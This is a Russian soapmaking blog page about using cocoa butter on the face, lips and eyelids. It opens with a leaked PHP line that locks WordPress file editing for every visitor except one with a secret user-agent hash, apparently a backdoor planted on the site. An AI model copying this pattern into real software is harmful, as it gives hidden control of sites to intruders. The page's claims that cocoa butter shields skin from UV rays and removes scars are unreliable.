if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Масло какао | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Масло какао

Масло какао является основной из главных составляющих частей всеми нами любимого плиточного шоколада и, тем не менее, это еще и прекрасное средство, применяемое в косметологии для ухода за кожей

Ингридиенты для мыла - масло какао Ингридиенты для мыла - масло какао

Мас­ло какао явля­ет­ся основ­ной из глав­ных состав­ля­ю­щих частей все­ми нами люби­мо­го пли­точ­но­го шоко­ла­да и, тем не менее, это еще и пре­крас­ное сред­ство, при­ме­ня­е­мое в кос­ме­то­ло­гии для ухо­да за кожей.

В отли­чие от дру­гих нату­раль­ных рас­ти­тель­ных масел, про­цесс полу­че­ния какао мас­ла доста­точ­но сло­жен и дли­те­лен. Сна­ча­ла семе­на, извле­чен­ные из пло­дов дере­ва какао, под­вер­га­ют­ся тако­му про­цес­су как фер­мен­та­ция (дру­ги­ми сло­ва­ми – бро­же­ние), в резуль­та­те чего они обре­та­ют более тем­ный корич­не­вый цвет, а так­же при­ят­ный «шоко­лад­ный» запах и вкус. После эти семе­на сор­ти­ру­ют­ся, очи­ща­ют­ся, про­хо­дят тер­ми­че­скую обра­бот­ку, дро­бят­ся и в конеч­ном ито­ге из них полу­ча­ют круп­ку какао. Затем эту круп­ку тон­ко измель­ча­ют, полу­чая тер­тое какао, из кото­ро­го уже в свою оче­редь мето­дом прес­со­ва­ния полу­ча­ют мас­ло какао.

Нату­раль­ное какао мас­ло, при­ме­ня­е­мое в кос­ме­то­ло­гии, име­ет наи­бо­лее высо­кий уро­вень очист­ки и не содер­жит в себе ника­ких хими­че­ских и вред­ных при­ме­сей. При тем­пе­ра­ту­ре до 25–27°C мас­ло оста­ет­ся твер­дым по сво­ей кон­си­стен­ции, и лег­ко раз­ла­мы­ва­ет­ся. Пла­вит­ся мас­ло какао при тем­пе­ра­ту­ре от 32 до 35°C, что дела­ет очень удоб­ным его при­ме­не­ние в ухо­де за кожей лица, так как при кон­так­те с кожей, нор­маль­ная тем­пе­ра­ту­ра кото­рой 36°C, мас­ло сра­зу же начи­на­ет таять.

Осно­ву мас­ла какао состав­ля­ют нена­сы­щен­ные и насы­щен­ные жир­ные кис­ло­ты, такие как оле­и­но­вая, сте­а­ри­но­вая, лау­ри­но­вая, паль­ми­ти­но­вая, лино­ле­вая и ара­хи­но­вая кис­ло­та. Все они игра­ют очень боль­шую роль в жиз­не­де­я­тель­но­сти нашей кожи (спо­соб­ству­ют ее увлаж­не­нию, вос­ста­нав­ли­ва­ют, замед­ля­ют про­цес­сы старения).

Основные действия масла какао на кожу лица

При­ме­не­ние мас­ла какао для лица осо­бен­но реко­мен­ду­ет­ся при сухой, шелу­ша­щей­ся и измож­ден­ной коже с недо­ста­точ­ным уров­нем влаж­но­сти. Так­же оно помо­га­ет в неко­то­ром роде омо­ло­дить уже увя­да­ю­щую и ста­ре­ю­щую кожу, начав­шую терять свою упру­гость и эла­стич­ность. Какао мас­ло заме­ча­тель­но пита­ет, увлаж­ня­ет, смяг­ча­ет, ожив­ля­ет и тони­зи­ру­ет кожу, делая ее еще более неж­ной, глад­кой и сия­ю­щей. Кро­ме того, оно обла­да­ет раз­гла­жи­ва­ю­щи­ми свой­ства­ми, что дела­ет его про­сто неза­ме­ни­мым в борь­бе про­тив мор­щин. Мас­ло какао явля­ет­ся еще и отлич­ным сред­ством для ухо­да за кожей вокруг глаз.

Иде­аль­но под­хо­дит при­ме­не­ние мас­ла какао для зим­не­го ухо­да за кожей лица, помо­гая избе­жать обвет­ри­ва­ния и обмо­ро­же­ния кожи и губ. Так­же мас­ло какао уско­ря­ет про­цесс вос­ста­нов­ле­ния повре­жден­ных кле­ток кожи, бла­го­да­ря чему его эффек­тив­но исполь­зо­вать после зага­ра или же для устра­не­ния таких кос­ме­ти­че­ских дефек­тов кожи как шра­мы, руб­цы и пят­на после пры­щей. Исполь­зуя мас­ло какао для лица мож­но избе­жать про­ник­но­ве­ния в кожу раз­лич­ных вред­ных веществ и ток­си­нов, что в осо­бен­но­сти акту­аль­но для жите­лей мега­по­ли­сов. К тому же оно помо­га­ет спра­вить­ся с устав­шим и серым цве­том лица и может бес­про­блем­но исполь­зо­вать­ся в ухо­де даже за самой чув­стви­тель­ной кожей.

Какао мас­ло лег­ко и быст­ро впи­ты­ва­ет­ся в кожу, глу­бо­ко про­ни­ка­ет в ее клет­ки и не остав­ля­ет после себя осо­бо жир­но­го блес­ка. Его при­ме­не­ние явля­ет­ся доволь­но таки про­стым и удоб­ным, ну и, конеч­но же, весь­ма эффективным.

Способы применения масла какао

В про­да­же име­ет­ся нема­ло кос­ме­ти­че­ских средств по ухо­ду за кожей, в состав кото­рых вхо­дит мас­ло какао. Но далее мы пого­во­рим имен­но о само­сто­я­тель­ном исполь­зо­ва­нии это­го мас­ла для лица, в домаш­них условиях.

Чистое мас­ло какао мож­но при­ме­нять в каче­стве пита­тель­но­го кре­ма при очень сухой и обез­во­жен­ной коже, а так­же при уже начи­на­ю­щей ста­реть, вялой, дряб­лой и мор­щи­ни­стой коже.

Для это­го необ­хо­ди­мо зажать неболь­шой кусо­чек мас­ла в руке (есте­ствен­но руки долж­ны быть тща­тель­но вымы­ты, а кожа лица очи­ще­на), и когда оно рас­та­ет, сма­зать им всю область лица. Или же мож­но про­сто при­ло­жить бру­со­чек какао мас­ла к лицу, и когда от сопри­кос­но­ве­ния с кожей оно нач­нет таять, акку­рат­но водить им по коже до пол­но­го ее сма­зы­ва­ния. Луч­ше все­го подоб­ным обра­зом исполь­зо­вать мас­ло какао на ночь. При­чем такое его при­ме­не­ние подой­дет так­же для нор­маль­ной, ком­би­ни­ро­ван­ной и чув­стви­тель­ной кожи лица. При излишне сухой и шелу­ша­щей­ся коже какао мас­ло мож­но нано­сить и вме­сто днев­но­го кре­ма. Тогда перед выхо­дом на ули­цу или же перед нане­се­ни­ем маки­я­жа доста­точ­но будет про­сто про­мок­нуть лицо сал­фет­кой. Осо­бен­но крайне реко­мен­ду­ет­ся при­ме­не­ние мас­ла какао для лица в холод­ную мороз­ную погоду.

Так­же хоро­шо сма­зы­вать какао мас­лом лицо и тело перед при­ня­ти­ем сол­неч­ных ванн. Это не толь­ко поспо­соб­ству­ет кра­си­во­му и ров­но­му зага­ру, но и защи­тит кожу от небла­го­при­ят­но­го воз­дей­ствия уль­тра­фи­о­ле­то­вых лучей. Кро­ме того, кожа сма­зан­ная мас­лом не пере­су­шит­ся, что очень важ­но для сохра­не­ния ее кра­со­ты и молодости.

В ухо­де за кожей век мас­ло какао может при­ме­нять­ся как и в чистом виде, так и в сме­си с дру­ги­ми рас­ти­тель­ны­ми мас­ла­ми. Необ­хо­ди­мо так­же рас­то­пить его в ладо­ни и нане­сти на область вокруг глаз. Если вам кажет­ся, что дан­ное мас­ло явля­ет­ся слиш­ком тяже­лым для вашей кожи, раз­ве­ди­те его в про­пор­ци­ях 1:2, или 1:3  с мас­лом шипов­ни­ка, мин­даль­ным, пер­си­ко­вым или кун­жут­ным мас­лом. Кста­ти, какао мас­ло хоро­шо укреп­ля­ет рес­ни­цы и бро­ви, а так­же может исполь­зо­вать­ся в каче­стве баль­за­ма для сухих, потрес­кав­ших­ся и обвет­рен­ных губ.

Что каса­ет­ся само­сто­я­тель­но­го при­го­тов­ле­ния домаш­них кре­мов, тот и тут мас­ло какао явля­ет­ся одним из самых неза­ме­ни­мых ингре­ди­ен­тов, поз­во­ля­ю­щих при­дать кре­му необ­хо­ди­мую густую консистенцию.

Широ­ко исполь­зу­ет­ся мас­ло какао для при­го­тов­ле­ния мыла, гид­ро­филь­ных и мас­саж­ных пли­ток для душа, пра­лине для ван­ны и дру­гой косметики.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!